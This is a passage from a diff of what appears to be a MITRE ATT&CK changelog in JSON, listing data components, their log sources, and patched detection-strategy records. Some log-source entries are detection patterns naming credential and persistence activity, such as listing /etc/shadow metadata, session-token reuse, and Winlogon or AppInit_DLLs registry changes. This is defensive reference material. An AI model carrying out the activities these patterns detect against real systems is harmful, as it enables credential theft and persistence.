+                            "channel": "Repeated requests to SMS-generating endpoints using anomalous or new user agents, IP ranges, or geographies."
+                        },
+                        {
+                            "name": "saas:auth",
+                            "channel": "signin_failed"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "API access without user login"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "Accessed third-party credential management service"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "login with reused session token and mismatched user agent or IP"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "Access via OAuth credentials with unusual scopes or from anomalous IPs"
+                        },
+                        {
+                            "name": "saas:MDM",
+                            "channel": "Authentication events to device management or enterprise mobility management consoles"
+                        },
+                        {
+                            "name": "saas:MDM",
+                            "channel": "Authentication events to Apple iCloud or enterprise device management services"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "session.impersonation.start"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Unusual OAuth app requesting message-read scopes for Slack/Teams/Jira"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "authentication_failure"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "API login using access_token without login history"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "Login"
+                        },
+                        {
+                            "name": "User Account",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4625"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4769, 1200, 1202"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4768, 4769, 4770"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4769"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4776, 4625"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4625, 4771, 4648"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4648"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.777000+00:00\", \"old_value\": \"2026-04-24 19:47:33.610000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0013",
+                            "external_id": "DC0013"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Account Metadata",
+                    "description": "Contextual data about an account, which may include a username, user ID, environmental data, etc.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4720, 4738"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4673"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AssumeRole"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,openat,read"
+                        },
+                        {
+                            "name": "macos:MDM",
+                            "channel": "profiles -P|getaccountpolicies"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetAccountPasswordPolicy"
+                        },
+                        {
+                            "name": "azure:audit",
+                            "channel": "operation contains 'Get*Password*Policy' OR 'List*Authentication*Policy' OR 'Get-ADDefaultDomainPasswordPolicy'"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Workload=AzureActiveDirectory OR Exchange AND (Operation=Cmdlet AND Parameters contains 'Password' AND (CmdletName='Get-*' OR CmdletName='Get-OrganizationConfig'))"
+                        },
+                        {
+                            "name": "saas:auth",
+                            "channel": "Refresh token issuance or refresh token usage from new IPs or user agents"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "Directory API Access: users.list or groups.list"
+                        },
+                        {
+                            "name": "CloudTrail:GetCallerIdentity",
+                            "channel": "GetCallerIdentity"
+                        },
+                        {
+                            "name": "vpxd.log",
+                            "channel": "vCenter Management"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of user account with UID <500"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4674"
+                        },
+                        {
+                            "name": "windows:osquery",
+                            "channel": "User enumeration with creation/last modified timestamps"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Listing of /etc/passwd and /etc/shadow metadata"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "User lifecycle events"
+                        },
+                        {
+                            "name": "Microsoft Entra ID Audit Logs",
+                            "channel": "RoleManagement.Read.Directory or Directory.Read.All"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "Azure CLI Operation: Microsoft.Graph/users/read"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "IAM API call: serviceAccounts.list or projects.getIamPolicy"
+                        },
+                        {
+                            "name": "Microsoft Graph API Logs",
+                            "channel": "users.list, directoryObjects.getByIds"
+                        },
+                        {
+                            "name": "Defender for Identity",
+                            "channel": "Suspicious Enumeration of Cloud Directory"
+                        },
+                        {
+                            "name": "Google Admin Audit",
+                            "channel": "users.list, groups.list"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "PassRole"
+                        },
+                        {
+                            "name": "gcp:iam",
+                            "channel": "PrincipalEmail with serviceAccountTokenCreator impersonating new identity"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AssumeRole: Discovery actions tied to assumed identities outside of normal context"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "User Enumeration Events"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "Directory API Access"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DirectoryService queries retrieving account information"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-03-13 22:24:06.660000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0013\", \"old_value\": \"https://attack.mitre.org/data-components/DC0013\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0063",
+                            "external_id": "DC0063"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Windows Registry Key Modification",
+                    "description": "Changes made to an existing registry key or its values. These modifications can include altering permissions, modifying stored data, or updating configuration settings.\n\n*Data Collection Measures:*\n\n- Windows Event Logs\n    - Event ID 4657 - Registry Value Modified: Logs changes to registry values, including modifications to startup entries, security settings, or system configurations.\n- Sysmon (System Monitor) for Windows\n    - Sysmon Event ID 13 - Registry Value Set: Captures changes to specific registry values.\n    - Sysmon Event ID 14 - Registry Key & Value Renamed: Logs renaming of registry keys, which may indicate evasion attempts.\n- Endpoint Detection and Response (EDR) Solutions\n    - Monitor registry modifications for suspicious behavior.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4657"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "StubPath value written under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MacroSecuritySettingsChanged or SafeModeDisabled"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=13, 14"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "modification to Winlogon registry keys such as Shell, Notify, or Userinit"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "Registry key modification HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient\\EnableMulticast"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "g_CiOptions modification or SIP state change"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "Autoruns reports DLLs in AppInit_DLLs key"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-03-13 23:12:09.029000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0063\", \"old_value\": \"https://attack.mitre.org/data-components/DC0063\"}}}",
+                    "previous_version": "2.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "detectionstrategies": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ba7a75c6-fcf5-4f36-8908-1fe1c30f690f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0210",
+                            "external_id": "DET0210"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Abuse of Domain Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c7706ddb-cf88-41c7-981b-a5e1bf6cfcfc",
+                        "x-mitre-analytic--74aade7b-b61a-46d0-a68b-33fba4f09f6e",
+                        "x-mitre-analytic--96050801-dc36-462f-982e-df2806eaa3ea",
+                        "x-mitre-analytic--f931e587-28f8-4923-b054-98d6348dcafe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--48e8d8b1-0117-48bd-a32d-f4e43b665bf3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0413",
+                            "external_id": "DET0413"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Abuse of Information Repositories for Data Collection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7dce56f3-43db-4787-ae13-bd2ce6851088",
+                        "x-mitre-analytic--59faf79f-831d-436b-9ce3-e5c1d338da6c",
+                        "x-mitre-analytic--3655f892-ed0d-4b76-9173-ecb7eebacd8a",
+                        "x-mitre-analytic--eac7b88d-0ee2-4fbf-9e0b-ea73c376ccb3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--72b209e2-8c65-4217-8532-fabd0cb54ae5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0455",
+                            "external_id": "DET0455"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Abuse of PowerShell for Arbitrary Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--78864416-9ea3-4285-aab4-ecf31c935253"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--655a8556-c82d-4148-b52a-7bc48fe7ce20",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0120",
+                            "external_id": "DET0120"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Account Access Removal via Multi-Platform Audit Correlation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7d0595b9-eca7-488d-bbc2-ed02ff4ced9b",
+                        "x-mitre-analytic--a941dd04-5626-4091-9eed-300d7d7f0a1f",
+                        "x-mitre-analytic--adbe8ef2-15e5-4fb9-83d8-4c67b7b1be78",
+                        "x-mitre-analytic--2c5d3103-2b9c-4b56-b415-c01e055fff64",
+                        "x-mitre-analytic--ba6c8c55-ee38-4219-a426-a3f1e04c7a8a",
+                        "x-mitre-analytic--af7bff30-45c5-4baf-9ced-68208b7ae836"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d6c4cc3b-6875-4288-8193-bf4c864560ab",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0096",
+                            "external_id": "DET0096"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Account Manipulation Behavior Chain Detection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--842ba5ee-dcd0-42bd-9ef8-867a4ab1c703",
+                        "x-mitre-analytic--0eb6cf59-4ba8-4cea-b64a-686ce7c69f70",
+                        "x-mitre-analytic--616ccbf4-08f2-4b54-8e41-a8e362e31827",
+                        "x-mitre-analytic--5c69f3b9-8f73-455e-8eb1-5281cd6ce6d5",
+                        "x-mitre-analytic--74565d24-df58-49b6-86e0-01a03d6dc2a7",
+                        "x-mitre-analytic--eb4a55f0-eff2-40f8-912e-43ba7e34603c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--430abda8-2a2c-4ab8-bbd6-eb205a189362",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0415",
+                            "external_id": "DET0415"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Application Exhaustion Flood Detection Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0b514d96-12ce-41e2-b870-b35933d7faa6",
+                        "x-mitre-analytic--35c7be24-c1c0-4ddc-9356-dec5e39414be",
+                        "x-mitre-analytic--ade844ef-f156-4db2-bc11-9dbdc006c8d6",
+                        "x-mitre-analytic--867239cd-7939-446c-9efb-b2a7a5bd5403"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--da5ff985-fd0d-438f-8498-c8dc195f741a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0397",
+                            "external_id": "DET0397"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Automated Exfiltration Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4a92d2e9-fc28-4eac-9b3d-113e74d7bf2d",
+                        "x-mitre-analytic--31adce9b-8935-4abf-aaf2-0a13047e25e4",
+                        "x-mitre-analytic--031ed94b-50d9-451e-a853-29ee8d845773"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5e9a51b5-7e4a-4e78-a1ba-215ce937c877",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0186",
+                            "external_id": "DET0186"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Automated File and API Collection Detection Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--29433de9-360e-4189-9f6d-fb00c9a57e41",
+                        "x-mitre-analytic--70df3731-9576-4450-bd32-0f52cc8f0ec3",
+                        "x-mitre-analytic--f6ad51e5-b869-455d-acb1-ef725acb27cb",
+                        "x-mitre-analytic--00b2801f-752e-4b70-95fd-c2644ccef671"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a3bdd6e2-92d3-45db-a486-9f051c68672b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0088",
+                            "external_id": "DET0088"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Backup Software Discovery via CLI, Registry, and Process Inspection (T1518.002)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dbc6d9ca-9502-46a0-a59b-15b050bb539c",
+                        "x-mitre-analytic--93918e31-51b1-4d85-8b16-590871c2cc1f",
+                        "x-mitre-analytic--e3c81570-be1b-48c8-b000-b70173c5c226"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cf6a38ec-4c16-4c7f-8730-6e04f6dd6e67",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0280",
+                            "external_id": "DET0280"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-Based Registry Modification Detection on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--de8d67d4-9d2a-4379-be8b-3ae3f3b3ac75"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ec412019-109f-4f84-aa2f-d623f40254e0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0496",
+                            "external_id": "DET0496"
+                        }
+                    ],
+                    "object_marking_refs": [
